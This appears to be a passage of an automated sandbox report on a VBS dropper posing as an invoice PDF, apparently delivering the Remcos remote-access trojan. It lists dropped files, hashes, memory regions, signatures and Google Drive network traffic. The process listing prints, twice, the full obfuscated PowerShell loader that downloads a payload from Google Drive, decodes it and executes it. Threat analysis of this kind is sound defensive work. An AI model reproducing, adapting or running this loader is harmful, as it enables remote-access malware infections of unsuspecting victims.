MD5 2569a0d7d50631400cfbcc473943cea3
SHA1 54f7618e2bb9d766396e994e069e8e07b3a332b3
SHA256 f8ec181160dddf37dd00450222f0d4aafb3c308d59038775201d7e3485fd0cf7
SHA512 55d787ca72024f905b4c3a16d6c85a1196e7448de8febbb5a64f0ce89a669897696cdb87c231665d27c9f38b054ae486467a825cf453ad2d6540ef5f5332d675

memory/1744-292-0x0000000073660000-0x0000000073C0B000-memory.dmp

memory/1744-293-0x0000000073660000-0x0000000073C0B000-memory.dmp

memory/1744-294-0x0000000002590000-0x00000000025D0000-memory.dmp

memory/2892-295-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabCCC1.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6dcd1f6b6e5307f02a10bdc5d3dd6125
SHA1 1c90b82b1ba083a524e2031aeb15650c2cb9e5f5
SHA256 adcc8a43caaf47562a3fa5bbd0f58616d5fb2c65359111388dba1f81b48947b7
SHA512 99a5fc88367529cb47f82913d0df75e3ba7612e509c57a9f5776ffcd4de3a9bcb79e348ac224ebce9c06e7cc74b0424c19208eac791b9cae7b1519be1288dcf8

memory/2892-308-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2892-309-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2892-307-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2892-310-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/1744-311-0x0000000002590000-0x00000000025D0000-memory.dmp

memory/1744-312-0x0000000005F60000-0x0000000006060000-memory.dmp

memory/1744-313-0x0000000073660000-0x0000000073C0B000-memory.dmp

memory/1744-314-0x0000000073660000-0x0000000073C0B000-memory.dmp

memory/1744-315-0x0000000002590000-0x00000000025D0000-memory.dmp

memory/1744-316-0x00000000052E0000-0x00000000052E1000-memory.dmp

memory/1744-317-0x00000000063D0000-0x000000000AB7F000-memory.dmp

memory/1744-319-0x0000000002590000-0x00000000025D0000-memory.dmp

memory/1744-321-0x0000000005F60000-0x0000000006060000-memory.dmp

memory/1744-322-0x0000000077620000-0x00000000777C9000-memory.dmp

memory/1744-323-0x0000000077810000-0x00000000778E6000-memory.dmp

memory/1744-324-0x0000000077846000-0x0000000077847000-memory.dmp

memory/1744-325-0x0000000077810000-0x00000000778E6000-memory.dmp

memory/1744-339-0x0000000077810000-0x00000000778E6000-memory.dmp

C:\ProgramData\Remcos\remcos.exe

MD5 92f44e405db16ac55d97e3bfe3b132fa
SHA1 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA256 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512 f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

memory/1744-347-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-349-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-338-0x00000000063D0000-0x000000000AB7F000-memory.dmp

memory/1744-350-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-352-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-353-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-354-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-355-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-356-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-357-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-358-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-360-0x0000000002590000-0x00000000025D0000-memory.dmp

memory/1744-361-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-362-0x0000000073660000-0x0000000073C0B000-memory.dmp

memory/1744-364-0x000000000AD80000-0x000000000AE02000-memory.dmp

memory/1744-363-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-366-0x000000000AD80000-0x000000000AE02000-memory.dmp

memory/1744-365-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-369-0x000000000AD80000-0x000000000AE02000-memory.dmp

memory/1744-368-0x000000000AD80000-0x000000000AE02000-memory.dmp

memory/1744-371-0x000000000AD80000-0x000000000AE02000-memory.dmp

memory/1744-367-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-370-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-372-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-373-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-374-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1744-375-0x000000000AD80000-0x000000000BDE2000-memory.dmp

memory/1632-376-0x0000000002370000-0x00000000023B0000-memory.dmp

memory/1632-378-0x0000000002370000-0x00000000023B0000-memory.dmp

memory/1632-379-0x0000000002370000-0x00000000023B0000-memory.dmp

memory/1632-377-0x0000000073660000-0x0000000073C0B000-memory.dmp

memory/2892-380-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

memory/1632-382-0x0000000002370000-0x00000000023B0000-memory.dmp

memory/1632-381-0x0000000002370000-0x00000000023B0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-02 13:26

Reported

2024-04-02 13:28

Platform

win10v2004-20240226-en

Max time kernel

93s

Max time network

117s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\numer faktury_505603890324·pdf.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\numer faktury_505603890324·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Phenaceturic Betingelsesdel Biblioteksudlaanet Reshipments Eddikens Betsileos Manuma #>;$Peasantries=(cmd /c set /A 115^^0);Function Bundteksters ([String]$Exon){$Klimatologs=8;$Kemibgernsalivation=Volcano($Exon);For($Kemibger=7; $Kemibger -lt $Kemibgernsalivation; $Kemibger+=$Klimatologs){$Sidetallerkeners=$Exon.$Knapper.Invoke($Kemibger, 1);$Flatterers=$Flatterers+$Sidetallerkeners;}$Flatterers;}function Chivvy ($Tic){. ($melopoeic) ($Tic);}function Volcano ([String]$Ernringsfysiologerne){$Kimendes=$Ernringsfysiologerne.Length-1;$Kimendes;}$Peasantries=[char][int]$Peasantries;$Knapper=$Peasantries+'ubstring';$Skamrdmen=Bundteksters 'Organ,sTDisg.orrMerrymeaNonext,n Fluttesk.skadefCibo,sdeSkafninrVibraphrNsvisreiMatrikenCapillagUn ergr ';$Lazarist=Bundteksters 'UnclimbhNedgan,tHorsetotV,ldelipRettelss Notere:Skulk,n/ Autori/ClimactdCivi,isrLnindtgiHemiphrv Forli.eMotorbr.FortllegUdkonkuoCurvogroFugaci,g Af alklpeckingeSausage.Mi htescEgest,ooAmoknurmNegle.e/Proterouspine,ecOmbest.? EdnasceTrianguxSkulderpGlossapoboulevarBerettetSeletfa=.undevedInsug,nofondshaw Epita n oldninlv rdenso IrenesaScupperd La,oni& FritstiSt reomdBraciol=Rosenst1fors.ar7IndkomsE lederen Hainan3 solsortBjesstiBKies.elDParcookJHa,ideseG.ugeab6 FascinwRoentg VunavngiWAerifyiLRemanurbColdhearTofrontMdubleriBPhylloc2As.ylar3NedgrelHTowngatOGarb espcoloquipAstroma7underlgXIrrepeaU fbalanT H.ndreWRa etskdStoresl2Ph.ladiDDomflde ';$melopoeic=Bundteksters 'JournaliFil.ngieProwedaxUn.eare ';$fircylindrets=Bundteksters 'Xylocar$ VinlvmgDinornilScrofulolotteribbookboaaEuxe.itl Sc ewd:Stjert TunionisiThumbikl CrematsPrahmriaBandagenSpringedRegnefue Sekaned.ncowlme Un,urr Benigna=poles i GazomeS SuperitSigteliaRecirkurBe.wepttLeall.a-StvdragB HooteriP,ineuntUdbedrisUdaandeTOutplacrBibrin.a orskern SygneisNae.oidfAnkomneedipla,trBl.bber Rat.ish-ServobrS Cirkulo orskefuRegnvanrSaltlagcInt rmieStatspa Folkesk$UnderfaL KbenhaaFodboldz upersea TidnderGastroci JeaabnsVerdenstBo.sted Tropehj-Su,qualDNoncompeDisket.s,ydrocltUncongristuntmen I.islea Quarr tSensi aiSterlino St,imlnTropist Affolke$ AlcohoTH ltesaeOv.rrankIncarcesKisterstDoegngeiNonpunglC cilieaNetasderSelvantbFi,kedaeMadrigajSygeford BrugereErtholmrK ffrarsHagende ';Chivvy (Bundteksters 'Hundepi$ constig,erciallMis gynoRepentabWholelyaunmystilCaptans:SemiparTVandbadeStilisekBjer.stsFl kepotBundg,ritelepatlHydroseaEvoke,srThaneshbReparabeOver.asjFiresafdStartvreDe,kripr,eduktisB.atsch=Prepack$Gwineude Ad arsnHejrensvLystfis:LibelleaEngulfipTi,edespPosthusdhigh eaaBloatsttHemospoaDec bar ') ;Chivvy (Bundteksters 'MarksmaI ViscoumSeedcakpEquisidoWatchedr UdskydtQ oadse-,orgmesMWater eoSourbeldA.gribeuBortfall Rade,be Subtas RejsetiBShadcheiOptje.et Tanglos IndkliTT opophrForvandaoliniaanUnderlisCaninitfKeramike Blikv,r Oligom ') ;$Tekstilarbejders=$Tekstilarbejders+'\Gravrst.Coo' ;Chivvy (Bundteksters ' Heini.$ riegitgandels.l Maale,oAf opnibSl kaspaUnderv,l se icu: bloodiC TronfroChro.atu Slutk nFormndstDargerke Molassr EructkiTatarenn.llesfodHep tomeOwertern ExpecttAfsindiaTrebleptSuboptiiSeventyoOutflamn Kabine= iparia( AnecdoT ransmieNinetiesionisert Sukrin-E,iteriPDevolataEftersotFormat h Itam,l Saughen$Modera.T Tran,peSclerodkPlatonisnonvolutIndeholiSygeliglParahy aResundsrC managbDebil teConsentjC.mmododInconcle LignifrDy,frossTheftsr)Urinous ') ;while (-not $Counterindentation) {Chivvy (Bundteksters ' TurbopIbestyrefTeratog .onmanu(Sf,rmid$deenergTandouiliPhysapolPu tiersBlyholdaAftraednAsylst,dudsten.eTetra ydUnch lde Ob.kur.pro lamJSolsk noLif.odsb,erfidiSRollic,tObtenebasmitst.tPoitrineLindrin Rdkaa -BesprizecommunaqStm,ale Windsla$ CyclosSWebst.dkbesindea TelegrmSandvaar Bonmotd,issekkmReballoeVitrasenHjlpe i)Pertain Materia{O,erfreSSvips,ntUngatheavibrat rHermelitTerrito- LoblolSS ifflelmuscicaeBantusteUnen,hrpTraluce Samflel1 Unboun}UnmeltaeH,lesialFlerfamsIn,latoeSkattef{Tag rknSTandstitlovoveraLan,vinr BundfltKontr l-Telfon.SProjicelFr.landeSpecialePolychlpKulturp Transpi1re.sour; WeedieC TeglvrhFagraadiindertrv Somedev NonmonyStorebl Hall c$Autoca f Tred.eiAfbdendrDimittecDagafsnySs,ykkelSemiconiAfgrelsnGastropdCaponi,rTeks beeStukloftBaghaansForslvn}Kogepla ');Chivvy (Bundteksters 'udvikli$R.ducedg,nitterlRotatoroStraffebKystbanaKvaltprlPartici:HyperorCdr aattoS perdeuSwashbun P,eacct Mom.oleprocra rCentriciGendarmnUndef ad CowpieeVa.inaenA thenitY.gnobraMarty,it s.yllei ndtrdeoTimelnsn Cyanop=Me erie(PrluderTIdeentie T.ivlrsZonetertRegneud-TendovaPEvakueraNonseditA,etavlhDisting unfound$VrangmaTGuerr,lebiosyntkNonconcsProstattAdeuismi UniverlSmirks,aIsoproprEndetarbPartsfoeOcean,pjFolkered UnrevoeSomatogr mbassasFjernsy)Chu.kin ') ;}Chivvy (Bundteksters 'Fetolog$Selv,adg E,hanclWinegrooVindingbHu chinaDemissilBekmpel: JdedomH pouseheOprrskfnReinte vdetachriUngradus LumskenBeproseiFrbyvean La.ensgRazer ieFastprin Surre, Borger= Bmpele DukketeGCeromaneCyke.kut Unruin-h,wardsCUtilstroActinomnOpbygintStrandeeRoofersn heautot Ma,pak Galpes$Mi,eogrTDevanage LedelskDisk,tes .imulatDebatari Svampel BenediaStatskir A,golab ThisteeBoghvedjKreatiodLbetid eAnretnirKunstaksPolarog ');Chivvy (Bundteksters 'Spidska$k.ybbesgExplicali,citamo sammenbNullabla Husgerlbrinnyu:genotypb Plea.ae Con.enaDataopsu hin.ndmDrablyhoSknaandnIndt end Seetu.eAffatn, Blodba= Feltst Sovepil[BadevanSBud.etryAgrologsSnaps.ct Outbegetvelyd,m Afbeny.immunogCSlovenvoLate,tsnAfsp jlvPailsfueUnc.nnirRegionstFrstest]Flymeka: For ry: SerigrF GremaarOverhatoForcedsmSheafliB SateliaFlelseosUmuliggearts av6Apotele4Ufor.taSForkorttSkibstirHimm,lsiPrededinspygatmgAnastaz(.ikkerh$ PostmaHBeliggeeHoora enValgkonvBlokadeiI ternasMycetopnEmuersaiWondersn Efte lgAccolademedillenTngerne)Forfje, ');Chivvy (Bundteksters 'C,ocody$Nonri.agUnhandcl AfstbnofishboabMarnispaDeedinelCar.occ: NonfacUmindstenFiskerldarisinge.earninrVrd.ersf NstsvgoBirgittrMyosenhsS,bpacktSweetmeaSolutisaStil,ele Fa,ternEtherifd BegyndeStasisf Autofun=tilbage Charmer[C,lpurnSTelefony Be igtsP rietotForsmdee UglifimKob.erv.Barre,mT Udtrknebredygtx Secedet edirig.Exs uitENonwaivn rrivicC,icketoTickprod Electri GrsrodnDagpr.ggMusikra]termitb:Lugter.:CytosinApho,ocaSAltertaCLithopaIPhleba.ICu heab.AntinarGUtopiene oedelatAdfrd mSOve apptKas,emarNedkleniEmport nBar.ategUndersp(Un,ergo$Sta.islbbede,ageIndstniageron ouNonthinmWeddingoSpaniolnChilliedLaareneePing.in)Ph haly ');Chivvy (Bundteksters 'Dislik $KonverggVe,erinlAmtsboroDemontebThermoma BrstfllAfloese:.erraseDMaskinfr LineaeiVaabenlnInspisskThermoma entepebhabi iml WithgaeDefibrisVaginol=Indfrsl$PlagionUGruffien.hermotdClockcyeEmbryomrSupe.smfEksisteotrlkvinrBaadebrsMist lktFarmerea ,nformaAfryddee XylosinD.wnloadPlato,iem skinp.Th,ologsSkalksbu OverskbHgessoes ykkenftPartis.r PresswiOverflynsalooneg Thirty(Fost.rh3Appeten1 Veksli1.ienden2Con,ent2,dstopp3Rapunse,arom.tr3Cro,set1Forlibt3Unthi.k6S ralde7Chu chi)Svrmern ');Chivvy $Drinkables;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Phenaceturic Betingelsesdel Biblioteksudlaanet Reshipments Eddikens Betsileos Manuma #>;$Peasantries=(cmd /c set /A 115^^0);Function Bundteksters ([String]$Exon){$Klimatologs=8;$Kemibgernsalivation=Volcano($Exon);For($Kemibger=7; $Kemibger -lt $Kemibgernsalivation; $Kemibger+=$Klimatologs){$Sidetallerkeners=$Exon.$Knapper.Invoke($Kemibger, 1);$Flatterers=$Flatterers+$Sidetallerkeners;}$Flatterers;}function Chivvy ($Tic){. ($melopoeic) ($Tic);}function Volcano ([String]$Ernringsfysiologerne){$Kimendes=$Ernringsfysiologerne.Length-1;$Kimendes;}$Peasantries=[char][int]$Peasantries;$Knapper=$Peasantries+'ubstring';$Skamrdmen=Bundteksters 'Organ,sTDisg.orrMerrymeaNonext,n Fluttesk.skadefCibo,sdeSkafninrVibraphrNsvisreiMatrikenCapillagUn ergr ';$Lazarist=Bundteksters 'UnclimbhNedgan,tHorsetotV,ldelipRettelss Notere:Skulk,n/ Autori/ClimactdCivi,isrLnindtgiHemiphrv Forli.eMotorbr.FortllegUdkonkuoCurvogroFugaci,g Af alklpeckingeSausage.Mi htescEgest,ooAmoknurmNegle.e/Proterouspine,ecOmbest.? EdnasceTrianguxSkulderpGlossapoboulevarBerettetSeletfa=.undevedInsug,nofondshaw Epita n oldninlv rdenso IrenesaScupperd La,oni& FritstiSt reomdBraciol=Rosenst1fors.ar7IndkomsE lederen Hainan3 solsortBjesstiBKies.elDParcookJHa,ideseG.ugeab6 FascinwRoentg VunavngiWAerifyiLRemanurbColdhearTofrontMdubleriBPhylloc2As.ylar3NedgrelHTowngatOGarb espcoloquipAstroma7underlgXIrrepeaU fbalanT H.ndreWRa etskdStoresl2Ph.ladiDDomflde ';$melopoeic=Bundteksters 'JournaliFil.ngieProwedaxUn.eare ';$fircylindrets=Bundteksters 'Xylocar$ VinlvmgDinornilScrofulolotteribbookboaaEuxe.itl Sc ewd:Stjert TunionisiThumbikl CrematsPrahmriaBandagenSpringedRegnefue Sekaned.ncowlme Un,urr Benigna=poles i GazomeS SuperitSigteliaRecirkurBe.wepttLeall.a-StvdragB HooteriP,ineuntUdbedrisUdaandeTOutplacrBibrin.a orskern SygneisNae.oidfAnkomneedipla,trBl.bber Rat.ish-ServobrS Cirkulo orskefuRegnvanrSaltlagcInt rmieStatspa Folkesk$UnderfaL KbenhaaFodboldz upersea TidnderGastroci JeaabnsVerdenstBo.sted Tropehj-Su,qualDNoncompeDisket.s,ydrocltUncongristuntmen I.islea Quarr tSensi aiSterlino St,imlnTropist Affolke$ AlcohoTH ltesaeOv.rrankIncarcesKisterstDoegngeiNonpunglC cilieaNetasderSelvantbFi,kedaeMadrigajSygeford BrugereErtholmrK ffrarsHagende ';Chivvy (Bundteksters 'Hundepi$ constig,erciallMis gynoRepentabWholelyaunmystilCaptans:SemiparTVandbadeStilisekBjer.stsFl kepotBundg,ritelepatlHydroseaEvoke,srThaneshbReparabeOver.asjFiresafdStartvreDe,kripr,eduktisB.atsch=Prepack$Gwineude Ad arsnHejrensvLystfis:LibelleaEngulfipTi,edespPosthusdhigh eaaBloatsttHemospoaDec bar ') ;Chivvy (Bundteksters 'MarksmaI ViscoumSeedcakpEquisidoWatchedr UdskydtQ oadse-,orgmesMWater eoSourbeldA.gribeuBortfall Rade,be Subtas RejsetiBShadcheiOptje.et Tanglos IndkliTT opophrForvandaoliniaanUnderlisCaninitfKeramike Blikv,r Oligom ') ;$Tekstilarbejders=$Tekstilarbejders+'\Gravrst.Coo' ;Chivvy (Bundteksters ' Heini.$ riegitgandels.l Maale,oAf opnibSl kaspaUnderv,l se icu: bloodiC TronfroChro.atu Slutk nFormndstDargerke Molassr EructkiTatarenn.llesfodHep tomeOwertern ExpecttAfsindiaTrebleptSuboptiiSeventyoOutflamn Kabine= iparia( AnecdoT ransmieNinetiesionisert Sukrin-E,iteriPDevolataEftersotFormat h Itam,l Saughen$Modera.T Tran,peSclerodkPlatonisnonvolutIndeholiSygeliglParahy aResundsrC managbDebil teConsentjC.mmododInconcle LignifrDy,frossTheftsr)Urinous ') ;while (-not $Counterindentation) {Chivvy (Bundteksters ' TurbopIbestyrefTeratog .onmanu(Sf,rmid$deenergTandouiliPhysapolPu tiersBlyholdaAftraednAsylst,dudsten.eTetra ydUnch lde Ob.kur.pro lamJSolsk noLif.odsb,erfidiSRollic,tObtenebasmitst.tPoitrineLindrin Rdkaa -BesprizecommunaqStm,ale Windsla$ CyclosSWebst.dkbesindea TelegrmSandvaar Bonmotd,issekkmReballoeVitrasenHjlpe i)Pertain Materia{O,erfreSSvips,ntUngatheavibrat rHermelitTerrito- LoblolSS ifflelmuscicaeBantusteUnen,hrpTraluce Samflel1 Unboun}UnmeltaeH,lesialFlerfamsIn,latoeSkattef{Tag rknSTandstitlovoveraLan,vinr BundfltKontr l-Telfon.SProjicelFr.landeSpecialePolychlpKulturp Transpi1re.sour; WeedieC TeglvrhFagraadiindertrv Somedev NonmonyStorebl Hall c$Autoca f Tred.eiAfbdendrDimittecDagafsnySs,ykkelSemiconiAfgrelsnGastropdCaponi,rTeks beeStukloftBaghaansForslvn}Kogepla ');Chivvy (Bundteksters 'udvikli$R.ducedg,nitterlRotatoroStraffebKystbanaKvaltprlPartici:HyperorCdr aattoS perdeuSwashbun P,eacct Mom.oleprocra rCentriciGendarmnUndef ad CowpieeVa.inaenA thenitY.gnobraMarty,it s.yllei ndtrdeoTimelnsn Cyanop=Me erie(PrluderTIdeentie T.ivlrsZonetertRegneud-TendovaPEvakueraNonseditA,etavlhDisting unfound$VrangmaTGuerr,lebiosyntkNonconcsProstattAdeuismi UniverlSmirks,aIsoproprEndetarbPartsfoeOcean,pjFolkered UnrevoeSomatogr mbassasFjernsy)Chu.kin ') ;}Chivvy (Bundteksters 'Fetolog$Selv,adg E,hanclWinegrooVindingbHu chinaDemissilBekmpel: JdedomH pouseheOprrskfnReinte vdetachriUngradus LumskenBeproseiFrbyvean La.ensgRazer ieFastprin Surre, Borger= Bmpele DukketeGCeromaneCyke.kut Unruin-h,wardsCUtilstroActinomnOpbygintStrandeeRoofersn heautot Ma,pak Galpes$Mi,eogrTDevanage LedelskDisk,tes .imulatDebatari Svampel BenediaStatskir A,golab ThisteeBoghvedjKreatiodLbetid eAnretnirKunstaksPolarog ');Chivvy (Bundteksters 'Spidska$k.ybbesgExplicali,citamo sammenbNullabla Husgerlbrinnyu:genotypb Plea.ae Con.enaDataopsu hin.ndmDrablyhoSknaandnIndt end Seetu.eAffatn, Blodba= Feltst Sovepil[BadevanSBud.etryAgrologsSnaps.ct Outbegetvelyd,m Afbeny.immunogCSlovenvoLate,tsnAfsp jlvPailsfueUnc.nnirRegionstFrstest]Flymeka: For ry: SerigrF GremaarOverhatoForcedsmSheafliB SateliaFlelseosUmuliggearts av6Apotele4Ufor.taSForkorttSkibstirHimm,lsiPrededinspygatmgAnastaz(.ikkerh$ PostmaHBeliggeeHoora enValgkonvBlokadeiI ternasMycetopnEmuersaiWondersn Efte lgAccolademedillenTngerne)Forfje, ');Chivvy (Bundteksters 'C,ocody$Nonri.agUnhandcl AfstbnofishboabMarnispaDeedinelCar.occ: NonfacUmindstenFiskerldarisinge.earninrVrd.ersf NstsvgoBirgittrMyosenhsS,bpacktSweetmeaSolutisaStil,ele Fa,ternEtherifd BegyndeStasisf Autofun=tilbage Charmer[C,lpurnSTelefony Be igtsP rietotForsmdee UglifimKob.erv.Barre,mT Udtrknebredygtx Secedet edirig.Exs uitENonwaivn rrivicC,icketoTickprod Electri GrsrodnDagpr.ggMusikra]termitb:Lugter.:CytosinApho,ocaSAltertaCLithopaIPhleba.ICu heab.AntinarGUtopiene oedelatAdfrd mSOve apptKas,emarNedkleniEmport nBar.ategUndersp(Un,ergo$Sta.islbbede,ageIndstniageron ouNonthinmWeddingoSpaniolnChilliedLaareneePing.in)Ph haly ');Chivvy (Bundteksters 'Dislik $KonverggVe,erinlAmtsboroDemontebThermoma BrstfllAfloese:.erraseDMaskinfr LineaeiVaabenlnInspisskThermoma entepebhabi iml WithgaeDefibrisVaginol=Indfrsl$PlagionUGruffien.hermotdClockcyeEmbryomrSupe.smfEksisteotrlkvinrBaadebrsMist lktFarmerea ,nformaAfryddee XylosinD.wnloadPlato,iem skinp.Th,ologsSkalksbu OverskbHgessoes ykkenftPartis.r PresswiOverflynsalooneg Thirty(Fost.rh3Appeten1 Veksli1.ienden2Con,ent2,dstopp3Rapunse,arom.tr3Cro,set1Forlibt3Unthi.k6S ralde7Chu chi)Svrmern ');Chivvy $Drinkables;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2000 -ip 2000

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 2488

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
NL 142.250.179.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
NL 142.251.39.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

MD5 061970f3be09180d9f4da817170240bc
SHA1 e808121ec2a2932eb9521b3bfdcb27b1c4d13a86
SHA256 d65eff1171202c7afe122834b61d11eb7a41edea276398ecb5c7377693856555
SHA512 12a1abf9abf6ced2a33720953688407deb617b7ebe1e8d7158555935c0e1a51ce8e073264a54a2fa6981716d2126cb00d6eb5e754b111c3da33192f4e02b814f

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

MD5 c132ead93dd767c6f441efc59786eb6c
SHA1 7d35d3ed07d81c00bdc965a23b7a587a4285d818
SHA256 a5e18065666df9865e94c3f20e3657b0224912d9d877e8564ee99eef4a67844b
SHA512 de5f572665f07a30d2f2371cff8e4960440e16e91a00c6d90e3ef2be9865b793d4fa4370be86b9ad072b725d1302ecb9fa490720d81188246f86792f9096af9e

memory/4756-263-0x000001DF669D0000-0x000001DF669F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w5jonlaf.1g0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4756-273-0x00007FFFD8460000-0x00007FFFD8F21000-memory.dmp

memory/4756-275-0x000001DF66A20000-0x000001DF66A30000-memory.dmp

memory/4756-276-0x000001DF68EA0000-0x000001DF68EC6000-memory.dmp

memory/4756-274-0x000001DF66A20000-0x000001DF66A30000-memory.dmp

memory/4756-277-0x000001DF69090000-0x000001DF690A4000-memory.dmp

memory/4756-278-0x000001DF66A20000-0x000001DF66A30000-memory.dmp

memory/2000-282-0x0000000004B00000-0x0000000004B10000-memory.dmp

memory/2000-283-0x0000000005140000-0x0000000005768000-memory.dmp

memory/2000-281-0x0000000004B00000-0x0000000004B10000-memory.dmp

memory/2000-280-0x0000000074450000-0x0000000074C00000-memory.dmp

memory/2000-284-0x00000000050C0000-0x00000000050E2000-memory.dmp

memory/2000-286-0x0000000005850000-0x00000000058B6000-memory.dmp

memory/2000-285-0x00000000057E0000-0x0000000005846000-memory.dmp

memory/2000-279-0x0000000004A00000-0x0000000004A36000-memory.dmp

memory/2000-296-0x0000000005940000-0x0000000005C94000-memory.dmp

memory/2000-297-0x0000000005F90000-0x0000000005FAE000-memory.dmp

memory/2000-298-0x0000000005FC0000-0x000000000600C000-memory.dmp

memory/2000-300-0x0000000006580000-0x000000000659A000-memory.dmp

memory/2000-299-0x0000000007970000-0x0000000007FEA000-memory.dmp

memory/2000-302-0x00000000071B0000-0x00000000071D2000-memory.dmp

memory/2000-301-0x0000000007200000-0x0000000007296000-memory.dmp

memory/2000-304-0x0000000007430000-0x0000000007452000-memory.dmp

memory/2000-303-0x0000000007FF0000-0x0000000008594000-memory.dmp

memory/2000-305-0x0000000007490000-0x00000000074A4000-memory.dmp

memory/4756-306-0x00007FFFD8460000-0x00007FFFD8F21000-memory.dmp

memory/4756-310-0x00007FFFD8460000-0x00007FFFD8F21000-memory.dmp

memory/2000-307-0x0000000074450000-0x0000000074C00000-memory.dmp